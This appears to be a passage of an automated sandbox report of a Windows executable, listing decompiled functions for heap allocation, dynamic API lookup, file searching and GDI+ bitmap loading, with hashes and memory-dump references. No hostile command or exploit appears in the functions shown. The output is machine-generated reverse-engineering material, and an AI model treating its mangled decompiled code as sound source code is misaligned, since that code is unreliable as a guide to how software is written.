						if(_t13 != 0) {
							break;
						}
						_t34 = _t34 + 4;
						if(_t34 != _a16) {
							continue;
						}
						_t27 =  *0xb9e7ac; // 0x37e7c6f
						goto L7;
					}
					_t27 =  *0xb9e7ac; // 0x37e7c6f
					goto L8;
				}
				L2:
				return _t33;
			}

0x00b8aca3
0x00b8acac
0x00b8acb2
0x00b8acbc
0x00b8acbe
0x00b8acc2
0x00b8ad2d
0x00000000
0x00b8ad2d
0x00b8acc6
0x00b8accc
0x00b8acd2
0x00b8acee
0x00b8acee
0x00b8acf0
0x00b8acf2
0x00b8ad1d
0x00b8ad1f
0x00b8ad27
0x00b8ad2b
0x00000000
0x00b8ad2b
0x00b8acfe
0x00b8ad02
0x00b8ad17
0x00000000
0x00b8ad17
0x00b8ad0b
0x00000000
0x00000000
0x00000000
0x00000000
0x00b8acd4
0x00b8acd4
0x00b8acd6
0x00b8acde
0x00000000
0x00000000
0x00b8ace0
0x00b8ace6
0x00000000
0x00000000
0x00b8ace8
0x00000000
0x00b8ace8
0x00b8ad0f
0x00000000
0x00b8ad0f
0x00b8acc8
0x00000000

APIs

GetProcAddress.KERNEL32(00000000,?), ref: 00B8ACF8

Memory Dump Source

Source File: 00000000.00000002.268617007.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000000.00000002.268588954.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.269911240.0000000000B93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270395727.0000000000BC3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b60000_1JCAVkYU3U.jbxd

Similarity

API ID: AddressProc
String ID:
API String ID: 190572456-0
Opcode ID: 0a935857672e9d52e9c5b89cc7fd72e6a6ed566614aa69e31f035f049af39a36
Instruction ID: 6c0c10d20543ce1ac69d5e96ace7df68e53553ac1e87dfdad33d4852005dc813
Opcode Fuzzy Hash: 0a935857672e9d52e9c5b89cc7fd72e6a6ed566614aa69e31f035f049af39a36
Instruction Fuzzy Hash: 3F112C336002256FAB21FE18DC5095A73D5EB8432071641B2FD15EB264DB34EC01CBD2

Uniqueness

Uniqueness Score: -1.00%

Function 00B69215 Relevance: 1.6, APIs: 1, Instructions: 53
COMMON

Download Yara Rule

C-Code - Quality: 55%

			E00B69215(void* __ebx, void* __edi, void* __eflags) {
				void* _t21;
				intOrPtr _t27;
				intOrPtr _t36;
				void* _t38;
				intOrPtr _t39;
				void* _t41;
				void* _t48;

				E00B7EB78(0xb92895, _t41);
				E00B613BA(_t41 - 0x20, E00B67C64());
				 *(_t41 - 4) =  *(_t41 - 4) & 0x00000000;
				_t39 = E00B6D114( *((intOrPtr*)(_t41 + 8)),  *((intOrPtr*)(_t41 - 0x20)),  *((intOrPtr*)(_t41 - 0x1c)), _t38);
				if(_t39 > 0) {
					_t27 =  *((intOrPtr*)(_t41 + 0x10));
					_t36 =  *((intOrPtr*)(_t41 + 0xc));
					do {
						_t48 = 0 - _t27;
						if(_t48 > 0 || _t48 >= 0 && _t39 >= _t36) {
							_t39 = _t36;
						}
						if(_t39 > 0) {
							E00B6D300( *((intOrPtr*)(_t41 + 8)), _t41,  *((intOrPtr*)(_t41 - 0x20)), _t39);
							asm("cdq");
							_t36 = _t36 - _t39;
							asm("sbb ebx, edx");
						}
						_push( *((intOrPtr*)(_t41 - 0x1c)));
						_push( *((intOrPtr*)(_t41 - 0x20)));
						_t39 = E00B6D114( *((intOrPtr*)(_t41 + 8)));
					} while (_t39 > 0);
				}
				_t21 = E00B615FB(_t41 - 0x20); // executed
				 *[fs:0x0] =  *((intOrPtr*)(_t41 - 0xc));
				return _t21;
			}

0x00b6921a
0x00b6922c
0x00b6923a
0x00b69243
0x00b69247
0x00b6924a
0x00b6924e
0x00b69251
0x00b69253
0x00b69255
0x00b6925d
0x00b6925d
0x00b69261
0x00b6926a
0x00b69271
0x00b69272
0x00b69274
0x00b69274
0x00b69276
0x00b6927c
0x00b69284
0x00b69286
0x00b6928b
0x00b6928f
0x00b69298
0x00b692a0

APIs

__EH_prolog.LIBCMT ref: 00B6921A

Memory Dump Source

Source File: 00000000.00000002.268617007.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000000.00000002.268588954.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.269911240.0000000000B93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270395727.0000000000BC3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b60000_1JCAVkYU3U.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: ced786577d0eedac844cd1ef67f68d78df83a27b9c5c13b792411c482cef9c32
Instruction ID: c816738a2c8623a8c198e7f66e98bcc44f1422eb171121296fce286f961ce7b8
Opcode Fuzzy Hash: ced786577d0eedac844cd1ef67f68d78df83a27b9c5c13b792411c482cef9c32
Instruction Fuzzy Hash: 07018833D00528ABCF11AFA8CD919DEB7B5FF98750F0545A5F816BB252DA38CD04C6A0

Uniqueness

Uniqueness Score: -1.00%

Function 00B7DA52 Relevance: 1.6, APIs: 1, Instructions: 53
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E00B7DA52(void* __ecx, void* __edx, void* __eflags) {
				void* __ebx;
				intOrPtr _t19;
				char _t20;
				char _t21;
				void* _t24;
				void* _t25;
				void* _t38;
				void* _t44;
				intOrPtr _t46;

				_t38 = __edx;
				E00B7EB78(0xb92b3c, _t44);
				_push(__ecx);
				E00B7EC50(0x2108);
				_push(_t25);
				 *((intOrPtr*)(_t44 - 0x10)) = _t46;
				E00B86066(0xbb5872, "X");
				E00B70659(0xbb7894, _t38, 0xb935f0);
				E00B86066(0xbb6892,  *((intOrPtr*)(_t44 + 0xc)));
				E00B65B3D(0xbac578, _t38,  *((intOrPtr*)(_t44 + 0xc)));
				_t4 = _t44 - 4;
				 *(_t44 - 4) =  *(_t44 - 4) & 0x00000000;
				_t19 = 2;
				 *0xbb4850 = _t19;
				 *0xbb484c = _t19;
				 *0xbb4848 = _t19;
				_t20 =  *0xba8461; // 0x0
				 *0xbb36d3 = _t20;
				_t21 =  *0xba8462; // 0x1
				_push(0xbac578);
				 *0xbb370c = 1;
				 *0xbb370f = 1;
				 *0xbb36d4 = _t21;
				E00B67B0D(_t44 - 0x2118, _t38,  *_t4);
				 *(_t44 - 4) = 1;
				E00B67C7D(_t44 - 0x2118, _t38,  *_t4);
				_t24 = E00B67B9E(_t25, _t44 - 0x2118); // executed
				 *[fs:0x0] =  *((intOrPtr*)(_t44 - 0xc));
				return _t24;
			}

0x00b7da52
0x00b7da57
0x00b7da5c
0x00b7da62
0x00b7da67
0x00b7da6a
0x00b7da77
0x00b7da88
0x00b7da95
0x00b7daa6
0x00b7daab
0x00b7daab
0x00b7dab7
0x00b7dab8
0x00b7dabd
0x00b7dac2
0x00b7dac7
0x00b7dacc
0x00b7dad1
0x00b7dad6
0x00b7dad7
0x00b7dade
0x00b7dae5
0x00b7daea
0x00b7daf5
0x00b7daf9
0x00b7db04
0x00b7db0e
0x00b7db17

APIs

__EH_prolog.LIBCMT ref: 00B7DA57

Part of subcall function 00B70659: _wcslen.LIBCMT ref: 00B7066F

Part of subcall function 00B67B0D: __EH_prolog.LIBCMT ref: 00B67B12

Memory Dump Source

Source File: 00000000.00000002.268617007.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000000.00000002.268588954.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.269911240.0000000000B93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270395727.0000000000BC3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b60000_1JCAVkYU3U.jbxd

Similarity

API ID: H_prolog$_wcslen
String ID:
API String ID: 2838827086-0
Opcode ID: 33c097e8d2ed5480a9ddbc7ccbb75fbae19667a06843f6b891d5cc2643cc56d7
Instruction ID: c97a6b8742c93ba3430b5e577a271da90b9b5e7918e2d9e507c34ea87d9806dc
Opcode Fuzzy Hash: 33c097e8d2ed5480a9ddbc7ccbb75fbae19667a06843f6b891d5cc2643cc56d7
Instruction Fuzzy Hash: D1112332908280AFD711EB68EC07BDC7BE4EB2A710F1081DAE105973A2DFF50A40CB61

Uniqueness

Uniqueness Score: -1.00%

Function 00B8B136 Relevance: 1.5, APIs: 1, Instructions: 39
memoryCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 95%

			E00B8B136(void* __ecx, signed int _a4, signed int _a8) {
				void* _t8;
				void* _t12;
				signed int _t13;
				void* _t15;
				signed int _t16;
				signed int _t18;
				long _t19;

				_t15 = __ecx;
				_t18 = _a4;
				if(_t18 == 0) {
					L2:
					_t19 = _t18 * _a8;
					if(_t19 == 0) {
						_t19 = _t19 + 1;
					}
					while(1) {
						_t8 = RtlAllocateHeap( *0xbc26e4, 8, _t19); // executed
						if(_t8 != 0) {
							break;
						}
						__eflags = E00B88C34();
						if(__eflags == 0) {
							L8:
							 *((intOrPtr*)(E00B891A8())) = 0xc;
							__eflags = 0;
							return 0;
						}
						_t12 = E00B87A5E(_t15, _t16, __eflags, _t19);
						_pop(_t15);
						__eflags = _t12;
						if(_t12 == 0) {
							goto L8;
						}
					}
					return _t8;
				}
				_t13 = 0xffffffe0;
				_t16 = _t13 % _t18;
				if(_t13 / _t18 < _a8) {
					goto L8;
				}
				goto L2;
			}

0x00b8b136
0x00b8b13c
0x00b8b141
0x00b8b14f
0x00b8b14f
0x00b8b155
0x00b8b157
0x00b8b157
0x00b8b16e
0x00b8b177
0x00b8b17f
0x00000000
0x00000000
0x00b8b15f
0x00b8b161
0x00b8b183
0x00b8b188
0x00b8b18e
0x00000000
0x00b8b18e
0x00b8b164
0x00b8b169
0x00b8b16a
0x00b8b16c
0x00000000
0x00000000
0x00b8b16c
0x00000000
0x00b8b16e
0x00b8b147
0x00b8b148
0x00b8b14d
0x00000000
0x00000000
0x00000000

APIs

RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00B89813,00000001,00000364,?,00B840EF,?,?,00BA1098), ref: 00B8B177

Memory Dump Source

Source File: 00000000.00000002.268617007.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000000.00000002.268588954.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.269911240.0000000000B93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270395727.0000000000BC3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b60000_1JCAVkYU3U.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 0c99db79f66f1205a5e012823461ad03c11a18b72c1604aaae11d80c10e6ec4e
Instruction ID: 5c4911de21392b2db0cc989e4d9a0fae2a74f1b4b548704d67ba0757852c9e11
Opcode Fuzzy Hash: 0c99db79f66f1205a5e012823461ad03c11a18b72c1604aaae11d80c10e6ec4e
Instruction Fuzzy Hash: 94F03032565125679B257A71AC1EF6A77C8EB45760B1881A5B818BF1B0CF70D901C7A0

Uniqueness

Uniqueness Score: -1.00%

Function 00B83C0D Relevance: 1.5, APIs: 1, Instructions: 34
libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E00B83C0D(void* __ecx, signed int _a4, CHAR* _a8, intOrPtr _a12, intOrPtr _a16) {
				_Unknown_base(*)()* _t10;
				struct HINSTANCE__* _t12;
				_Unknown_base(*)()* _t13;
				_Unknown_base(*)()** _t19;
				signed int _t20;
				signed int _t21;

				_t19 = 0xbc20ec + _a4 * 4;
				_t10 =  *_t19;
				_t21 = _t20 | 0xffffffff;
				if(_t10 == _t21) {
					L6:
					return 0;
				}
				if(_t10 == 0) {
					_t12 = E00B83B72(__ecx, _a12, _a16); // executed
					if(_t12 == 0) {
						L5:
						 *_t19 = _t21;
						goto L6;
					}
					_t13 = GetProcAddress(_t12, _a8);
					if(_t13 == 0) {
						goto L5;
					}
					 *_t19 = _t13;
					return _t13;
				}
				return _t10;
			}

0x00b83c15
0x00b83c1c
0x00b83c1f
0x00b83c24
0x00b83c51
0x00000000
0x00b83c51
0x00b83c28
0x00b83c30
0x00b83c39
0x00b83c4f
0x00b83c4f
0x00000000
0x00b83c4f
0x00b83c3f
0x00b83c47
0x00000000
0x00000000
0x00b83c4b
0x00000000
0x00b83c4b
0x00b83c56

APIs

GetProcAddress.KERNEL32(00000000,?), ref: 00B83C3F

Memory Dump Source

Source File: 00000000.00000002.268617007.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000000.00000002.268588954.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.269911240.0000000000B93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270395727.0000000000BC3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b60000_1JCAVkYU3U.jbxd

Similarity

API ID: AddressProc
String ID:
API String ID: 190572456-0
Opcode ID: 09caa9511ccd864a66c3e6b13423c0ba459dd8673b1ba9e14885b1ba14a171cc
Instruction ID: a57137cb0047607dac3771cd44b36441502e7efb306303a5295aa0c6443f1e43
Opcode Fuzzy Hash: 09caa9511ccd864a66c3e6b13423c0ba459dd8673b1ba9e14885b1ba14a171cc
Instruction Fuzzy Hash: 27F0A9322003169F8F12AEA8EC00A9A77E9FF05F207104165FA05E71A0EB31EA20CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00B88E06 Relevance: 1.5, APIs: 1, Instructions: 32
memoryCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 94%

			E00B88E06(void* __ecx, long _a4) {
				void* _t4;
				void* _t6;
				void* _t7;
				void* _t8;
				long _t9;

				_t7 = __ecx;
				_t9 = _a4;
				if(_t9 > 0xffffffe0) {
					L7:
					 *((intOrPtr*)(E00B891A8())) = 0xc;
					__eflags = 0;
					return 0;
				}
				if(_t9 == 0) {
					_t9 = _t9 + 1;
				}
				while(1) {
					_t4 = RtlAllocateHeap( *0xbc26e4, 0, _t9); // executed
					if(_t4 != 0) {
						break;
					}
					__eflags = E00B88C34();
					if(__eflags == 0) {
						goto L7;
					}
					_t6 = E00B87A5E(_t7, _t8, __eflags, _t9);
					_pop(_t7);
					__eflags = _t6;
					if(_t6 == 0) {
						goto L7;
					}
				}
				return _t4;
			}

0x00b88e06
0x00b88e0c
0x00b88e12
0x00b88e44
0x00b88e49
0x00b88e4f
0x00000000
0x00b88e4f
0x00b88e16
0x00b88e18
0x00b88e18
0x00b88e2f
0x00b88e38
0x00b88e40
0x00000000
0x00000000
0x00b88e20
0x00b88e22
0x00000000
0x00000000
0x00b88e25
0x00b88e2a
0x00b88e2b
0x00b88e2d
0x00000000
0x00000000
0x00b88e2d
0x00000000

APIs

RtlAllocateHeap.NTDLL(00000000,?,?,?,00B84286,?,0000015D,?,?,?,?,00B85762,000000FF,00000000,?,?), ref: 00B88E38

Memory Dump Source

Source File: 00000000.00000002.268617007.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000000.00000002.268588954.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.269911240.0000000000B93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270395727.0000000000BC3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b60000_1JCAVkYU3U.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: ac6ee264dc7d69d36f1dfe5b80137d35dbe7b2b92a959fe61eb9782118554d94
Instruction ID: 61b0fa114e2264ae38d7f99a0a65c5b6966d3cf7abe2c32eff8ae9c75de9396c
Opcode Fuzzy Hash: ac6ee264dc7d69d36f1dfe5b80137d35dbe7b2b92a959fe61eb9782118554d94
Instruction Fuzzy Hash: F0E06D3128662667EA7637659C09BAB76C8DF457A6F9501E1BC18AB4B1CF60CC00C7E1

Uniqueness

Uniqueness Score: -1.00%

Function 00B65ABD Relevance: 1.5, APIs: 1, Instructions: 31
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E00B65ABD(intOrPtr __ecx, void* __eflags) {
				void* _t36;

				E00B7EB78(0xb92739, _t36);
				_push(__ecx);
				 *((intOrPtr*)(_t36 - 0x10)) = __ecx;
				E00B6B505(__ecx); // executed
				 *(_t36 - 4) =  *(_t36 - 4) & 0x00000000;
				E00B70637();
				 *(_t36 - 4) = 1;
				E00B70637();
				 *(_t36 - 4) = 2;
				E00B70637();
				 *(_t36 - 4) = 3;
				E00B70637();
				 *(_t36 - 4) = 4;
				E00B70637();
				 *(_t36 - 4) = 5;
				E00B65CAC(__ecx,  *(_t36 - 4));
				 *[fs:0x0] =  *((intOrPtr*)(_t36 - 0xc));
				return __ecx;
			}

0x00b65ac2
0x00b65ac7
0x00b65acb
0x00b65ace
0x00b65ad3
0x00b65add
0x00b65ae8
0x00b65aec
0x00b65af7
0x00b65afb
0x00b65b06
0x00b65b0a
0x00b65b15
0x00b65b19
0x00b65b20
0x00b65b24
0x00b65b2f
0x00b65b37

APIs

__EH_prolog.LIBCMT ref: 00B65AC2

Part of subcall function 00B6B505: __EH_prolog.LIBCMT ref: 00B6B50A

Memory Dump Source

Source File: 00000000.00000002.268617007.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000000.00000002.268588954.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.269911240.0000000000B93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270395727.0000000000BC3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b60000_1JCAVkYU3U.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 35e213db89a38242edc743cce55cbc0578f1673e3b3add88640dbb83fabbc502
Instruction ID: 96f90764e58b0607411e63a1c96df2f8441f4d63c60dd662e18dc93281176170
Opcode Fuzzy Hash: 35e213db89a38242edc743cce55cbc0578f1673e3b3add88640dbb83fabbc502
Instruction Fuzzy Hash: 4701AF30920790DAD725F7B8C0617EDFBE4DF65304F5084CEA46A63282CBB45B08D7A2

Uniqueness

Uniqueness Score: -1.00%

Function 00B69620 Relevance: 1.5, APIs: 1, Instructions: 30
COMMON

Download Yara Rule

C-Code - Quality: 89%

			E00B69620(void* __ecx) {
				void* _t16;
				void* _t21;

				_t21 = __ecx;
				_t16 = 1;
				if( *(__ecx + 8) != 0xffffffff) {
					if( *((char*)(__ecx + 0x15)) == 0 &&  *((intOrPtr*)(__ecx + 0x10)) == 0) {
						_t5 = FindCloseChangeNotification( *(__ecx + 8)) - 1; // -1
						asm("sbb bl, bl");
						_t16 =  ~_t5 + 1;
					}
					 *(_t21 + 8) =  *(_t21 + 8) | 0xffffffff;
				}
				 *(_t21 + 0x10) =  *(_t21 + 0x10) & 0x00000000;
				if(_t16 == 0 &&  *((intOrPtr*)(_t21 + 0x1e)) != _t16) {
					E00B66BD5(0xba1098, _t21 + 0x32);
				}
				return _t16;
			}

0x00b69622
0x00b69624
0x00b6962a
0x00b69630
0x00b69641
0x00b69646
0x00b69648
0x00b69648
0x00b6964a
0x00b6964a
0x00b6964e
0x00b69654
0x00b69664
0x00b69664
0x00b6966d

APIs

FindCloseChangeNotification.KERNELBASE(000000FF,?,?,00B695D6,?,?,?,?,?,00B92641,000000FF), ref: 00B6963B

Memory Dump Source

Source File: 00000000.00000002.268617007.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000000.00000002.268588954.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.269911240.0000000000B93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270395727.0000000000BC3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b60000_1JCAVkYU3U.jbxd

Similarity

API ID: ChangeCloseFindNotification
String ID:
API String ID: 2591292051-0
Opcode ID: b44d83aaa5ad6813ba4798734f67ff77867ed4af946df7b97a457362e2594864
Instruction ID: 0114bac67490a289abd2b88c0ffb9cf516078233e99fd73f243f5d653fd11084
Opcode Fuzzy Hash: b44d83aaa5ad6813ba4798734f67ff77867ed4af946df7b97a457362e2594864
Instruction Fuzzy Hash: 0EF0E231082B159FDB308F24C448B92B7ECEB13335F044BAED0E2439E0D778698D8A40

Uniqueness

Uniqueness Score: -1.00%

Function 00B6A56D Relevance: 1.5, APIs: 1, Instructions: 27
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00B6A56D(void* __ecx, void* __eflags, WCHAR* _a4, intOrPtr _a8) {
				void* _t13;
				intOrPtr _t19;

				_t19 = _a8;
				 *((char*)(_t19 + 0x1044)) = 0;
				if(E00B6BDB4(_a4) != 0) {
					L3:
					return 0;
				}
				_t13 = E00B6A69B(0xffffffff, _a4, _t19); // executed
				if(_t13 == 0xffffffff) {
					goto L3;
				}
				FindClose(_t13); // executed
				 *(_t19 + 0x1040) =  *(_t19 + 0x1040) & 0x00000000;
				 *((char*)(_t19 + 0x100c)) = E00B6A28F( *((intOrPtr*)(_t19 + 0x1008)));
				 *((char*)(_t19 + 0x100d)) = E00B6A2A6( *((intOrPtr*)(_t19 + 0x1008)));
				return 1;
			}

0x00b6a56e
0x00b6a576
0x00b6a584
0x00b6a5cb
0x00000000
0x00b6a5cb
0x00b6a58d
0x00b6a595
0x00000000
0x00000000
0x00b6a598
0x00b6a5a4
0x00b6a5b6
0x00b6a5c1
0x00000000

APIs

Part of subcall function 00B6A69B: FindFirstFileW.KERNELBASE(?,?,?,?,?,?,00B6A592,000000FF,?,?), ref: 00B6A6C4
Part of subcall function 00B6A69B: FindFirstFileW.KERNELBASE(?,?,?,?,00000800,?,?,?,?,00B6A592,000000FF,?,?), ref: 00B6A6F2
Part of subcall function 00B6A69B: GetLastError.KERNEL32(?,?,00000800,?,?,?,?,00B6A592,000000FF,?,?), ref: 00B6A6FE

FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 00B6A598

Memory Dump Source

Source File: 00000000.00000002.268617007.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000000.00000002.268588954.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.269911240.0000000000B93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270395727.0000000000BC3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b60000_1JCAVkYU3U.jbxd

Similarity

API ID: Find$FileFirst$CloseErrorLast
String ID:
API String ID: 1464966427-0
Opcode ID: 259549914d2090986eadfe51f41e9f29a31cb4b6f810e2d22306783b4570bfa1
Instruction ID: 6f2007090d3a82b4e6aed35ab6798f8ac909e042d39f2e0d4224b1f1ec95f3f1
Opcode Fuzzy Hash: 259549914d2090986eadfe51f41e9f29a31cb4b6f810e2d22306783b4570bfa1
Instruction Fuzzy Hash: BAF08931008790AACF2267B48944BC77BD05F25331F048A8DF1FE62196C27950949F23

Uniqueness

Uniqueness Score: -1.00%

Function 00B70E08 Relevance: 1.5, APIs: 1, Instructions: 21
threadCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E00B70E08() {
				void* __esi;
				void* _t2;

				L00B71B58(); // executed
				_t2 = E00B71B5D();
				if(_t2 != 0) {
					_t2 = E00B66C31(_t2, 0xba1098, 0xff, 0xff);
				}
				if( *0xba10a4 != 0) {
					_t2 = E00B66C31(_t2, 0xba1098, 0xff, 0xff);
				}
				__imp__SetThreadExecutionState(1);
				return _t2;
			}

0x00b70e0a
0x00b70e0f
0x00b70e20
0x00b70e25
0x00b70e25
0x00b70e31
0x00b70e36
0x00b70e36
0x00b70e3d
0x00b70e45

APIs

SetThreadExecutionState.KERNEL32 ref: 00B70E3D

Memory Dump Source

Source File: 00000000.00000002.268617007.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000000.00000002.268588954.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.269911240.0000000000B93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270395727.0000000000BC3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b60000_1JCAVkYU3U.jbxd

Similarity

API ID: ExecutionStateThread
String ID:
API String ID: 2211380416-0
Opcode ID: 66969273c1b70df78927b965f6394e355edb4a4a422e22c402304a7ed567fabe
Instruction ID: 1a52638d9300bdd71ef3104b6997464cd112fd8c711580cd50bc6b3f94d76df7
Opcode Fuzzy Hash: 66969273c1b70df78927b965f6394e355edb4a4a422e22c402304a7ed567fabe
Instruction Fuzzy Hash: 80D05B11A1505556DB21372C69567FF36C6CFC7311F0D48E7F16D67283CE584886A271

Uniqueness

Uniqueness Score: -1.00%

Function 00B7A626 Relevance: 1.5, APIs: 1, Instructions: 16
memoryCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E00B7A626(signed int __eax, void* __ecx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				void* _t6;

				_push(__ecx);
				_push(0x10);
				L00B7EB02();
				_v8 = __eax;
				if(__eax == 0) {
					return 0;
				}
				_t6 = E00B7A3B9(__eax, _a4, _a8); // executed
				return _t6;
			}

0x00b7a629
0x00b7a62a
0x00b7a62c
0x00b7a631
0x00b7a636
0x00000000
0x00b7a647
0x00b7a640
0x00000000

APIs

GdipAlloc.GDIPLUS(00000010), ref: 00B7A62C

Part of subcall function 00B7A3B9: GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 00B7A3DA

Memory Dump Source

Source File: 00000000.00000002.268617007.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true

